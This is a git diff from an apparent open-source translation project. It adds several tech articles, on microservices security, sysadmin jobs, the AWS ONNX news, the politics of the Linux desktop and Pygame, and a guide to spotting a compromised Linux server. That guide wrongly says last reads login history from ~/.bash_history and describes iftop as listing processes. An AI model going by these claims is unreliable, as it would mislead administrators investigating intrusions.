requirements—password checking, encryption, cryptographic key management, authorisation, etc.—to small, well-defined blocks. You can then do all the things that I've mentioned above to try to make sure it's done correctly. + +And yet there's more. We all know that not everybody is great at writing security-related code. By decomposing your architecture such that all security-sensitive code is restricted to well-defined components, you get the chance to put your best security people on that and restrict the danger that J. Random Coder[8][10] will put something in that bypasses or downgrades a key security control. + +It can also act as an opportunity for learning: It's always good to be able to point to a design/implementation/test/monitoring tuple and say: "That's how it should be done. Hear, read, mark, learn, and inwardly digest.[9][11]" + +Should you go about decomposing all of your legacy applications into microservices? Probably not. But given all the benefits you can accrue, you might consider starting with your security functions. + +* * * + +1Well, a little bit—it's always nice to have readers. + +2I know they are: I wrote them. + +3Probably less fascinating. + +4At the time this article was written. It's entirely possible that I—or one of you—may edit the article to change that. + +5This sounds like a gardening term, which is interesting. Not that I really like gardening, but still.[6][12] + +6Amusingly, I first wrote, "…if you're going to decompose your architect…," which sounds like the strapline for an IT-themed murder film. + +7Regular readers may remember a reference to the excellent film  _The Thick of It_ . + +8Other generic personae exist; please take your pick. + +9Not a cryptographic digest: I don't think that's what the original writers had in mind. + + _This article originally appeared on [Alice, Eve, and Bob—a security blog][13] and is republished with permission._ + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/11/microservices-are-security-issue + +作者:[Mike Bursell ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/mikecamel +[1]:https://blog.openshift.com/microservices-how-to-explain-them-to-your-ceo/?intcmp=7016000000127cYAAQ&src=microservices_resource_menu1 +[2]:https://www.openshift.com/promotions/microservices.html?intcmp=7016000000127cYAAQ&src=microservices_resource_menu2 +[3]:https://opensource.com/business/16/11/secured-devops-microservices?src=microservices_resource_menu3 +[4]:https://opensource.com/article/17/11/microservices-are-security-issue?rate=GDH4xOWsgYsVnWbjEIoAcT_92b8gum8XmgR6U0T04oM +[5]:https://opensource.com/article/17/11/microservices-are-security-issue#1 +[6]:https://opensource.com/article/17/11/microservices-are-security-issue#2 +[7]:https://opensource.com/article/17/11/microservices-are-security-issue#3 +[8]:https://opensource.com/article/17/11/microservices-are-security-issue#5 +[9]:https://opensource.com/article/17/11/microservices-are-security-issue#7 +[10]:https://opensource.com/article/17/11/microservices-are-security-issue#8 +[11]:https://opensource.com/article/17/11/microservices-are-security-issue#9 +[12]:https://opensource.com/article/17/11/microservices-are-security-issue#6 +[13]:https://aliceevebob.com/2017/10/31/why-microservices-are-a-security-issue/ +[14]:https://opensource.com/user/105961/feed +[15]:https://opensource.com/tags/security +[16]:https://aliceevebob.com/2017/03/14/systems-security-why-it-matters/ +[17]:https://opensource.com/article/17/11/microservices-are-security-issue#4 +[18]:https://opensource.com/article/17/10/systems-architect +[19]:https://opensource.com/users/mikecamel +[20]:https://opensource.com/users/mikecamel +[21]:https://opensource.com/users/mikecamel +[22]:https://opensource.com/article/17/11/microservices-are-security-issue#comments +[23]:https://opensource.com/resources/what-are-microservices +[24]:https://en.wikipedia.org/wiki/Microservices +[25]:https://en.wikipedia.org/wiki/Unix_philosophy diff --git a/sources/tech/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md b/sources/tech/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md deleted file mode 100644 index 27379cbe40..0000000000 --- a/sources/tech/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md +++ /dev/null @@ -1,70 +0,0 @@ -translating by wangy325... - - -Open Source Cloud Skills and Certification Are Key for SysAdmins -============================================================ - - -![os jobs](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/open-house-sysadmin.jpg?itok=i5FHc3lu "os jobs") -Sysadmins with open source skills and certification can command higher pay, according to the 2017 Open Source Jobs Report.[Creative Commons Zero][1] - -System administrator is one of the most common positions employers are looking to fill among 53 percent of respondents to the [2017 Open Source Jobs Report][3]. Consequently, sysadmins with skills in engineering can command higher salaries, as these positions are among the hardest to fill, the report finds. - -Sysadmins are generally responsible for installing, supporting, and maintaining servers or other computer systems, and planning for and responding to service outages and other problems. - -Overall, this year’s report finds the skills most in demand are open source cloud (47 percent), application development (44 percent), Big Data (43 percent) and both DevOps and security (42 percent). - -The report also finds that 58 percent of hiring managers are planning to hire more open source professionals, and 67 percent say hiring of open source professionals will increase more than in other areas of the business. This represents a two-point increase over last year among employers who said open source hiring would be their top field of recruitment. - -At the same time, 89 percent of hiring managers report it is difficult to find open source talent. - -### Why get certified - -The desire for sysadmins is incentivizing hiring managers to offer formal training and/or certifications in the discipline in 53 percent of organizations, compared to 47 percent last year, the Open Source Jobs Report finds. - -IT professionals interested in sysadmin positions should consider Linux certifications. Searches on several of the more well-known job posting sites reveal that the [CompTIA Linux+][4]certification is the top certification for entry-level Linux sysadmin, while [Red Hat Certified Engineer (RHCE)][5] and [Red Hat Certified System Administrator (RHCSA)][6] are the main certifications for higher-level positions. - -In 2016, a sysadmin commanded a salary of $79,583, a change of -0.8 percent from the previous year, according to Dice’s [2017 Tech Salary Survey][7]. The systems architect position paid $125,946, a year-over-year change of -4.7 percent. Yet, the survey observes that “Highly skilled technology professionals remain in the most demand, especially those candidates proficient in the technologies needed to support industry transformation and growth.” - -When it comes to open source skills, HBase (an open-source distributed database), ranked as one that garners among the highest pay for tech pros in the Dice survey. In the networking and database category, the OpenVMS operating system ranked as another high-paying skill. - -### The sysadmin role - -One of a sysadmin’s responsibilities is to be available 24/7 when a problem occurs. The position calls for a mindset that is about “zero-blame, lean, iterative improvement in process or technology,’’ and one that is open to change, writes Paul English, a board member for the League of Professional System Administrators, a non-profit professional association for the advancement of the practice of system administration, in  [opensource.com][8]. He adds that being a sysadmin means “it’s almost a foregone conclusion that you’ll work with open source software like Linux, BSD, and even open source Solaris.” - -Today’s sysadmins will more often work with software rather than hardware, and should be prepared to write small scripts, according to English. - -### Outlook for 2018 - -Expect to see sysadmins among the tech professionals many employers in North America will be hiring in 2018, according to [Robert Half’s 2018 Salary Guide for Technology Professionals][9]. Increasingly, soft skills and leadership qualities are also highly valued. - -“Good listening and critical-thinking skills, which are essential to understanding and resolving customers’ issues and concerns, are important for almost any IT role today, but especially for help desk and desktop support professionals,’’ the report states. - -This jibes with some of the essential skills needed at various stages of the sysadmin position, including strong analytical skills and an ability to solve problems quickly, according to [The Linux Foundation][10]. - -Other skills sysadmins should have as they move up the ladder are: interest in structured approaches to system configuration management; experience in resolving security issues; experience with user identity management; ability to communicate in non-technical terms to non-technical people; and ability to modify system to meet new security requirements. - - _[Download ][11]the full 2017 Open Source Jobs Report now._ - --------------------------------------------------------------------------------- - -via: https://www.linux.com/blog/open-source-cloud-skills-and-certification-are-key-sysadmins - -作者:[ ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]: -[1]:https://www.linux.com/licenses/category/creative-commons-zero -[2]:https://www.linux.com/files/images/open-house-sysadminjpg -[3]:https://www.linuxfoundation.org/blog/2017-jobs-report-highlights-demand-open-source-skills/ -[4]:https://certification.comptia.org/certifications/linux?tracking=getCertified/certifications/linux.aspx -[5]:https://www.redhat.com/en/services/certification/rhce -[6]:https://www.redhat.com/en/services/certification/rhcsa -[7]:http://marketing.dice.com/pdf/Dice_TechSalarySurvey_2017.pdf?aliId=105832232 -[8]:https://opensource.com/article/17/7/truth-about-sysadmins -[9]:https://www.roberthalf.com/salary-guide/technology -[10]:https://www.linux.com/learn/10-essential-skills-novice-junior-and-senior-sysadmins%20%20 -[11]:http://bit.ly/2017OSSjobsreport diff --git a/sources/tech/20171124 Photon Could Be Your New Favorite Container OS.md b/sources/tech/20171124 Photon Could Be Your New Favorite Container OS.md index 147a2266cc..d282ef5445 100644 --- a/sources/tech/20171124 Photon Could Be Your New Favorite Container OS.md +++ b/sources/tech/20171124 Photon Could Be Your New Favorite Container OS.md @@ -1,9 +1,6 @@ -KeyLD Translating - Photon Could Be Your New Favorite Container OS ============================================================ - ![Photon OS](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon-linux.jpg?itok=jUFHPR_c "Photon OS") Jack Wallen says Photon OS is an outstanding platform, geared specifically for containers.[Creative Commons Zero][5]Pixabay @@ -109,9 +106,9 @@ Give Photon a try and see if it doesn’t make deploying Docker containers and/o -------------------------------------------------------------------------------- -via: https://www.linux.com/learn/intro-to-linux/2017/11/photon-could-be-your-new-favorite-container-os +via: 网址 -作者:[JACK WALLEN ][a] +作者:[ JACK WALLEN][a] 译者:[译者ID](https://github.com/译者ID) 校对:[校对者ID](https://github.com/校对者ID) diff --git a/sources/tech/20171125 AWS to Help Build ONNX Open Source AI Platform.md b/sources/tech/20171125 AWS to Help Build ONNX Open Source AI Platform.md new file mode 100644 index 0000000000..c09d66bc57 --- /dev/null +++ b/sources/tech/20171125 AWS to Help Build ONNX Open Source AI Platform.md @@ -0,0 +1,76 @@ +AWS to Help Build ONNX Open Source AI Platform +============================================================ +![onnx-open-source-ai-platform](https://www.linuxinsider.com/article_images/story_graphics_xlarge/xl-2017-onnx-1.jpg) + + +Amazon Web Services has become the latest tech firm to join the deep learning community's collaboration on the Open Neural Network Exchange, recently launched to advance artificial intelligence in a frictionless and interoperable environment. Facebook and Microsoft led the effort. + +As part of that collaboration, AWS made its open source Python package, ONNX-MxNet, available as a deep learning framework that offers application programming interfaces across multiple languages including Python, Scala and open source statistics software R. + +The ONNX format will help developers build and train models for other frameworks, including PyTorch, Microsoft Cognitive Toolkit or Caffe2, AWS Deep Learning Engineering Manager Hagay Lupesko and Software Developer Roshani Nagmote wrote in an online post last week. It will let developers import those models into MXNet, and run them for inference. + +### Help for Developers + +Facebook and Microsoft this summer launched ONNX to support a shared model of interoperability for the advancement of AI. Microsoft committed its Cognitive Toolkit, Caffe2 and PyTorch to support ONNX. + +Cognitive Toolkit and other frameworks make it easier for developers to construct and run computational graphs that represent neural networks, Microsoft said. + +Initial versions of [ONNX code and documentation][4] were made available on Github. + +AWS and Microsoft last month announced plans for Gluon, a new interface in Apache MXNet that allows developers to build and train deep learning models. + +Gluon "is an extension of their partnership where they are trying to compete with Google's Tensorflow," observed Aditya Kaul, research director at [Tractica][5]. + +"Google's omission from this is quite telling but also speaks to their dominance in the market," he told LinuxInsider. + +"Even Tensorflow is open source, and so open source is not the big catch here -- but the rest of the ecosystem teaming up to compete with Google is what this boils down to," Kaul said. + +The Apache MXNet community earlier this month introduced version 0.12 of MXNet, which extends Gluon functionality to allow for new, cutting-edge research, according to AWS. Among its new features are variational dropout, which allows developers to apply the dropout technique for mitigating overfitting to recurrent neural networks. + +Convolutional RNN, Long Short-Term Memory and gated recurrent unit cells allow datasets to be modeled using time-based sequence and spatial dimensions, AWS noted. + +### Framework-Neutral Method + +"This looks like a great way to deliver inference regardless of which framework generated a model," said Paul Teich, principal analyst at [Tirias Research][6]. + +"This is basically a framework-neutral way to deliver inference," he told LinuxInsider. + +Cloud providers like AWS, Microsoft and others are under pressure from customers to be able to train on one network while delivering on another, in order to advance AI, Teich pointed out. + +"I see this as kind of a baseline way for these vendors to check the interoperability box," he remarked. + +"Framework interoperability is a good thing, and this will only help developers in making sure that models that they build on MXNet or Caffe or CNTK are interoperable," Tractica's Kaul pointed out. + +As to how this interoperability might apply in the real world, Teich noted that technologies such as natural language translation or speech recognition would require that Alexa's voice recognition technology be packaged and delivered to another developer's embedded environment. + +### Thanks, Open Source + +"Despite their competitive differences, these companies all recognize they owe a significant amount of their success to the software development advancements generated by the open source movement," said Jeff Kaplan, managing director of [ThinkStrategies][7]. + +"The Open Neural Network Exchange is committed to producing similar benefits and innovations in AI," he told LinuxInsider. + +A growing number of major technology companies have announced plans to use open source to speed the development of AI collaboration, in order to create more uniform platforms for development and research. + +AT&T just a few weeks ago announced plans [to launch the Acumos Project][8] with TechMahindra and The Linux Foundation. The platform is designed to open up efforts for collaboration in telecommunications, media and technology.  +![](https://www.ectnews.com/images/end-enn.gif) + +-------------------------------------------------------------------------------- + +via: https://www.linuxinsider.com/story/AWS-to-Help-Build-ONNX-Open-Source-AI-Platform-84971.html + +作者:[ David Jones ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linuxinsider.com/story/AWS-to-Help-Build-ONNX-Open-Source-AI-Platform-84971.html#searchbyline +[1]:https://www.linuxinsider.com/story/AWS-to-Help-Build-ONNX-Open-Source-AI-Platform-84971.html# +[2]:https://www.linuxinsider.com/perl/mailit/?id=84971 +[3]:https://www.linuxinsider.com/story/AWS-to-Help-Build-ONNX-Open-Source-AI-Platform-84971.html +[4]:https://github.com/onnx/onnx +[5]:https://www.tractica.com/ +[6]:http://www.tiriasresearch.com/ +[7]:http://www.thinkstrategies.com/ +[8]:https://www.linuxinsider.com/story/84926.html +[9]:https://www.linuxinsider.com/story/AWS-to-Help-Build-ONNX-Open-Source-AI-Platform-84971.html diff --git a/sources/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md b/sources/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md new file mode 100644 index 0000000000..dd61ad7a95 --- /dev/null +++ b/sources/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md @@ -0,0 +1,156 @@ +translating by lujun9972 +How To Tell If Your Linux Server Has Been Compromised +-------------- + +A server being compromised or hacked for the purpose of this guide is an unauthorized person or bot logging into the server in order to use it for their own, usually negative ends. + +Disclaimer: If your server has been compromised by a state organization like the NSA or a serious criminal group then you will not notice any problems and the following techniques will not register their presence. + +However, the majority of compromised servers are carried out by bots i.e. automated attack programs, in-experienced attackers e.g. “script kiddies”, or dumb criminals. + +These sorts of attackers will abuse the server for all it’s worth whilst they have access to it and take few precautions to hide what they are doing. + +### Symptoms of a compromised server + +When a server has been compromised by an in-experienced or automated attacker they will usually do something with it that consumes 100% of a resource. This resource will usually be either the CPU for something like crypt-currency mining or email spamming, or bandwidth for launching a DOS attack. + +This means that the first indication that something is amiss is that the server is “going slow”. This could manifest in the website serving pages much slower than usual, or email taking many minutes to deliver or send. + +So what should you look for? + +### Check 1 - Who’s currently logged in? + +The first thing you should look for is who is currently logged into the server. It is not uncommon to find the attacker actually logged into the server and working on it. + +The shell command to do this is w. Running w gives the following output: + +``` + 08:32:55 up 98 days, 5:43, 2 users, load average: 0.05, 0.03, 0.00 +USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT +root pts/0 113.174.161.1 08:26 0.00s 0.03s 0.02s ssh root@coopeaa12 +root pts/1 78.31.109.1 08:26 0.00s 0.01s 0.00s w + +``` + +One of those IP’s is a UK IP and the second is Vietnamese. That’s probably not a good thing. + +Stop and take a breath, don’t panic and simply kill their SSH connection. Unless you can stop then re-entering the server they will do so quickly and quite likely kick you off and stop you getting back in. + +Please see the What should I do if I’ve been compromised section at the end of this guide no how to proceed if you do find evidence of compromise. + +The whois command can be run on IP addresses and will tell you what all the information about the organization that the IP is registered to, including the country. + +### Check 2 - Who has logged in? + +Linux servers keep a record of which users logged in, from what IP, when and for how long. This information is accessed with the last command. + +The output looks like this: + +``` +root pts/1 78.31.109.1 Thu Nov 30 08:26 still logged in +root pts/0 113.174.161.1 Thu Nov 30 08:26 still logged in +root pts/1 78.31.109.1 Thu Nov 30 08:24 - 08:26 (00:01) +root pts/0 113.174.161.1 Wed Nov 29 12:34 - 12:52 (00:18) +root pts/0 14.176.196.1 Mon Nov 27 13:32 - 13:53 (00:21) + +``` + +There is a mix of my UK IP’s and some Vietnamese ones, with the top two still logged in. If you see any IP’s that are not authorized then refer to the final section. + +The login history is contained in a text file at ~/.bash_history and is therefore easily removable. Often, attackers will simply delete this file to try to cover their tracks. Consequently, if you run last and only see your current login, this is a Bad Sign. + +If there is no login history be very, very suspicious and continue looking for indications of compromise. + +### Check 3 - Review the command history + +This level of attacker will frequently take no precautions to leave no command history so running the history command will show you everything they have done. Be on the lookout for wget or curl commands to download out-of-repo software such as spam bots or crypto miners. + +The command history is contained in the ~/.bash_history file so some attackers will delete this file to cover what they have done. Just as with the login history, if you run history and don’t see anything then the history file has been deleted. Again this is a Bad Sign and you should review the server very carefully. + +### Check 4 - What’s using all the CPU? + +The sorts of attackers that you will encounter usually don’t take too many precautions to hide what they are doing. So they will run processes that consume all the CPU. This generally makes it pretty easy to spot them. Simply run top and look at the highest process. + +This will also show people exploiting your server without having logged in. This could be, for example, someone using an unprotected form-mail script to relay spam. + +If you don’t recognize the top process then either Google its name or investigate what it’s doing with losf or strace. + +To use these tools first copy its PID from top and run: + +``` +strace -p PID + +``` + +This will display all the system calls the process is making. It’s a lot of information but looking through it will give you a good idea what’s going on. + +``` +lsof -p PID + +``` + +This program will list the open files that the process has. Again, this will give you a good idea what it’s doing by showing you what files it is accessing. + +### Check 5 - Review the all the system processes + +If an unauthorized process is not consuming enough CPU to get listed noticeably on top it will still get displayed in a full process listing with ps. My proffered command is ps auxf for providing the most information clearly. + +You should be looking for any processes that you don’t recognize. The more times you run ps on your servers (which is a good habit to get into) the more obvious an alien process will stand out. + +### Check 6 - Review network usage by process + +The command iftop functions like top to show a ranked list of processes that are sending and receiving network data along with their source and destination. A process like a DOS attack or spam bot will immediately show itself at the top of the list. + +### Check 7 - What processes are listening for network connections? + +Often an attacker will install a program that doesn’t do anything except listen on the network port for instructions. This does not consume CPU or bandwidth whilst it is waiting so can get overlooked in the top type commands. + +The commands lsof and netstat will both list all networked processes. I use them with the following options: + +``` +lsof -i + +``` + +``` +netstat -plunt + +``` + +You should look for any process that is listed as in the LISTEN or ESTABLISHED status as these processes are either waiting for a connection (LISTEN) or have a connection open (ESTABLISHED). If you don’t recognize these processes use strace or lsof to try to see what they are doing. + +### What should I do if I’ve been compromised? + +The first thing to do is not to panic, especially if the attacker is currently logged in. You need to be able to take back control of the machine before the attacker is aware that you know about them. If they realize you know about them they may well lock you out of your server and start destroying any assets out of spite. + +If you are not very technical then simply shut down the server. Either from the server itself with shutdown -h now or systemctl poweroff. Or log into your hosting provider’s control panel and shut down the server. Once it’s powered off you can work on the needed firewall rules and consult with your provider in your own time. + +If you’re feeling a bit more confident and your hosting provider has an upstream firewall then create and enable the following two rules in this order: + +1. Allow SSH traffic from only your IP address. + +2. Block everything else, not just SSH but every protocol on every port. + +This will immediately kill their SSH session and give only you access to the server. + +If you don’t have access to an upstream firewall then you will have to create and enable these firewall rules on the server itself and then, when they are in place kill the attacker’s ssh session with the kill command. + +A final method, where available, is to log into the server via an out-of-band connection such as the serial console and stop networking with systemctl stop network.service. This will completely stop any network access so you can now enable the firewall rules in your own time. + +Once you have regained control of the server do not trust it. + +Do not attempt to fix things up and continue using the server. You can never be sure what the attacker did and so you can never sure the server is secure. + +The only sensible course of action is to copy off all the data that you need and start again from a fresh install. + +-------------------------------------------------------------------------------- + +via: https://bash-prompt.net/guides/server-hacked/ + +作者:[Elliot Cooper][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://bash-prompt.net diff --git a/sources/tech/20171128 The politics of the Linux desktop.md b/sources/tech/20171128 The politics of the Linux desktop.md new file mode 100644 index 0000000000..c9117dacfe --- /dev/null +++ b/sources/tech/20171128 The politics of the Linux desktop.md @@ -0,0 +1,110 @@ +The politics of the Linux desktop +============================================================ + +### If you're working in open source, why would you use anything but Linux as your main desktop? + + +![The politics of the Linux desktop](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/BUSINESS_networks.png?itok=XasNXxKs "The politics of the Linux desktop") +Image by : opensource.com + +At some point in 1997 or 1998—history does not record exactly when—I made the leap from Windows to the Linux desktop. I went through quite a few distributions, from Red Hat to SUSE to Slackware, then Debian, Debian Experimental, and (for a long time thereafter) Ubuntu. When I accepted a role at Red Hat, I moved to Fedora, and migrated both my kids (then 9 and 11) to Fedora as well. + +More Linux resources + +* [What is Linux?][1] + +* [What are Linux containers?][2] + +* [Download Now: Linux commands cheat sheet][3] + +* [Advanced Linux commands cheat sheet][4] + +* [Our latest Linux articles][5] + +For a few years, I kept Windows as a dual-boot option, and then realised that, if I was going to commit to Linux, then I ought to go for it properly. In losing Windows, I didn't miss much; there were a few games that I couldn't play, but it was around the time that the Civilization franchise was embracing Linux, so that kept me happy. + +The move to Linux wasn't plain sailing, by any stretch of the imagination. If you wanted to use fairly new hardware in the early days, you had to first ensure that there were  _any_  drivers for Linux, then learn how to compile and install them. If they were not quite my friends, **lsmod** and **modprobe** became at least close companions. I taught myself to compile a kernel and tweak the options to make use of (sometimes disastrous) new, "EXPERIMENTAL" features as they came out. Early on, I learned the lesson that you should always keep at least one kernel in your [LILO][12] list that you were  _sure_  booted fully. I cursed NVidia and grew horrified by SCSI. I flirted with early journalling filesystem options and tried to work out whether the different preempt parameters made any noticeable difference to my user experience or not. I began to accept that printers would never print—and then they started to. I discovered that the Bluetooth stack suddenly started to connect to things. + +Over the years, using Linux moved from being an uphill struggle to something that just worked. I moved my mother-in-law and then my father over to Linux so I could help administer their machines. And then I moved them off Linux so they could no longer ask me to help administer their machines. + +Over the years, using Linux moved from being an uphill struggle to something that just worked.It wasn't just at home, either: I decided that I would use Linux as my desktop for work, as well. I even made it a condition of employment for at least one role. Linux desktop support in the workplace caused different sets of problems. The first was the "well, you're on your own: we're not going to support you" email from IT support. VPNs were touch and go, but in the end, usually go. + +The biggest hurdle was Microsoft Office, until I discovered [CrossOver][13], which I bought with my own money, and which allowed me to run company-issued copies of Word, PowerPoint, and the rest on my Linux desktop. Fonts were sometimes a problem, and one company I worked for required Microsoft Lync. For this, and for a few other applications, I would sometimes have to run a Windows virtual machine (VM) on my Linux desktop.  Was this a cop out?  Well, a little bit: but I've always tried to restrict my usage of this approach to the bare minimum. + +### But why? + +"Why?" colleagues would ask. "Why do you bother? Why not just run Windows?" + +"Because I enjoy pain," was usually my initial answer, and then the more honest, "because of the principle of the thing." + +So this is it: I believe in open source. We have a number of very, very good desktop-compatible distributions these days, and most of the time they just work. If you use well-known or supported hardware, they're likely to "just work" pretty much as well as the two obvious alternatives, Windows or Mac. And they just work because many people have put much time into using them, testing them, and improving them. So it's not a case of why wouldn't I use Windows or Mac, but why would I ever consider  _not_  using Linux? If, as I do, you believe in open source, and particularly if you work within the open source community or are employed by an open source organisation, I struggle to see why you would even consider not using Linux. + +So it's not a case of why wouldn't I use Windows or Mac, but why would I ever consider not using Linux?I've spoken to people about this (of course I have), and here are the most common reasons—or excuses—I've heard. + +1. I'm more productive on Windows/Mac. + +2. I can't use app X on Linux, and I need it for my job. + +3. I can't game on Linux. + +4. It's what our customers use, so why we would alienate them? + +5. "Open" means choice, and I prefer a proprietary desktop, so I use that. + +Interestingly, I don't hear "Linux isn't good enough" much anymore, because it's manifestly untrue, and I can show that my own experience—and that of many colleagues—belies that. + +### Rebuttals + +If you believe in open source, then I contest that you should take the time to learn how to use a Linux desktop and the associated applications.Let's go through those answers and rebut them. + +1. **I'm more productive on Windows/Mac.** I'm sure you are. Anyone is more productive when they're using a platform or a system they're used to. If you believe in open source, then I contest that you should take the time to learn how to use a Linux desktop and the associated applications. If you're working for an open source organisation, they'll probably help you along, and you're unlikely to find you're much less productive in the long term. And, you know what? If you are less productive in the long term, then get in touch with the maintainers of the apps that are causing you to be less productive and help improve them. You don't have to be a coder. You could submit bug reports, suggest improvements, write documentation, or just test the most recent versions of the software. And then you're helping yourself and the rest of the community. Welcome to open source. + +1. **I can't use app X on Linux, and I need it for my job.** This may be true. But it's probably less true than you think. The people most often saying this with conviction are audio, video, or graphics experts. It was certainly the case for many years that Linux lagged behind in those areas, but have a look and see what the other options are. And try them, even if they're not perfect, and see how you can improve them. Alternatively, use a VM for that particular app. + +1. **I can't game on Linux.** Well, you probably can, but not all the games that you enjoy. This, to be clear, shouldn't really be an excuse not to use Linux for most of what you do. It might be a reason to keep a dual-boot system or to do what I did (after much soul-searching) and buy a games console (because Elite Dangerous really  _doesn't_  work on Linux, more's the pity). It should also be an excuse to lobby for your favourite games to be ported to Linux. + +1. **It's what our customers use, so why would we alienate them?** I don't get this one. Does Microsoft ban visitors with Macs from their buildings? Does Apple ban Windows users? Does Google allow non-Android phones through their doors? You don't kowtow to the majority when you're the little guy or gal; if you're working in open source, surely you should be proud of that. You're not going to alienate your customer—you're really not. + +1. **"Open" means choice, and I prefer a proprietary desktop, so I use that.**Being open certainly does mean you have a choice. You made that choice by working in open source. For many, including me, that's a moral and philosophical choice. Saying you embrace open source, but rejecting it in practice seems mealy mouthed, even insulting. Using openness to justify your choice is the wrong approach. Saying "I prefer a proprietary desktop, and company policy allows me to do so" is better. I don't agree with your decision, but at least you're not using the principle of openness to justify it. + +Is using open source easy? Not always. But it's getting easier. I think that we should stand up for what we believe in, and if you're reading [Opensource.com][14], then you probably believe in open source. And that, I believe, means that you should run Linux as your main desktop. + + _Note: I welcome comments, and would love to hear different points of view. I would ask that comments don't just list application X or application Y as not working on Linux. I concede that not all apps do. I'm more interested in justifications that I haven't covered above, or (perceived) flaws in my argument. Oh, and support for it, of course._ + + +### About the author + + [![](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/2017-05-10_0129.jpg?itok=Uh-eKFhx)][15] + + Mike Bursell - I've been in and around Open Source since around 1997, and have been running (GNU) Linux as my main desktop at home and work since then: [not always easy][7]...  I'm a security bod and architect, and am currently employed as Chief Security Architect for Red Hat.  I have a blog - "[Alice, Eve & Bob][8]" - where I write (sometimes rather parenthetically) about security.  I live in the UK and... [more about Mike Bursell][9][More about me][10] + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/11/politics-linux-desktop + +作者:[Mike Bursell ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/mikecamel +[1]:https://opensource.com/resources/what-is-linux?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[2]:https://opensource.com/resources/what-are-linux-containers?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[3]:https://developers.redhat.com/promotions/linux-cheatsheet/?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[4]:https://developers.redhat.com/cheat-sheet/advanced-linux-commands-cheatsheet?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[5]:https://opensource.com/tags/linux?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[6]:https://opensource.com/article/17/11/politics-linux-desktop?rate=do69ixoNzK0yg3jzFk0bc6ZOBsIUcqTYv6FwqaVvzUA +[7]:https://opensource.com/article/17/11/politics-linux-desktop +[8]:https://aliceevebob.com/ +[9]:https://opensource.com/users/mikecamel +[10]:https://opensource.com/users/mikecamel +[11]:https://opensource.com/user/105961/feed +[12]:https://en.wikipedia.org/wiki/LILO_(boot_loader) +[13]:https://en.wikipedia.org/wiki/CrossOver_(software) +[14]:https://opensource.com/ +[15]:https://opensource.com/users/mikecamel +[16]:https://opensource.com/users/mikecamel +[17]:https://opensource.com/users/mikecamel +[18]:https://opensource.com/article/17/11/politics-linux-desktop#comments +[19]:https://opensource.com/tags/linux diff --git a/sources/tech/20171128 Why Python and Pygame are a great pair for beginning programmers.md b/sources/tech/20171128 Why Python and Pygame are a great pair for beginning programmers.md new file mode 100644 index 0000000000..479bfb1232 --- /dev/null +++ b/sources/tech/20171128 Why Python and Pygame are a great pair for beginning programmers.md @@ -0,0 +1,142 @@ +Why Python and Pygame are a great pair for beginning programmers +============================================================ + +### We look at three reasons Pygame is a good choice for learning to program. + + +![What's the best game platform for beginning programmers?](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/code_development_programming.png?itok=M_QDcgz5 "What's the best game platform for beginning programmers?") +Image by :  + +opensource.com + +Last month, [Scott Nesbitt][10] wrote about [Mozilla awarding $500K to support open source projects][11]. Phaser, a HTML/JavaScript game platform, was [awarded $50,000][12]. I’ve been teaching Phaser to my pre-teen daughter for a year, and it's one of the best and easiest HTML game development platforms to learn. [Pygame][13], however, may be a better choice for beginners. Here's why. + +### 1\. One long block of code + +Pygame is based on Python, the [most popular language for introductory computer courses][14]. Python is great for writing out ideas in one long block of code. Kids start off with a single file and with a single block of code. Before they can get to functions or classes, they start with code that will soon resemble spaghetti. It’s like finger-painting, as they throw thoughts onto the page. + +More Python Resources + +* [What is Python?][1] + +* [Top Python IDEs][2] + +* [Top Python GUI frameworks][3] + +* [Latest Python content][4] + +* [More developer resources][5] + +This approach to learning works. Kids will naturally start to break things into functions and classes as their code gets more difficult to manage. By learning the syntax of a language like Python prior to learning about functions, the student will gain basic programming knowledge before using global and local scope. + +Most HTML games separate the structure, style, and programming logic into HTML, CSS, and JavaScript to some degree and require knowledge of CSS and HTML. While the separation is better in the long term, it can be a barrier for beginners. Once kids realize that they can quickly build web pages with HTML and CSS, they may get distracted by the visual excitement of colors, fonts, and graphics. Even those who stay focused on JavaScript coding will still need to learn the basic document structure that the JavaScript code sits in. + +### 2\. Global variables are more obvious + +Both Python and JavaScript use dynamically typed variables, meaning that a variable becomes a string, an integer, or float when it’s assigned; however, making mistakes is easier in JavaScript. Similar to typed variables, both JavaScript and Python have global and local variable scopes. In Python, global variables inside of a function are identified with the global keyword. + +Let’s 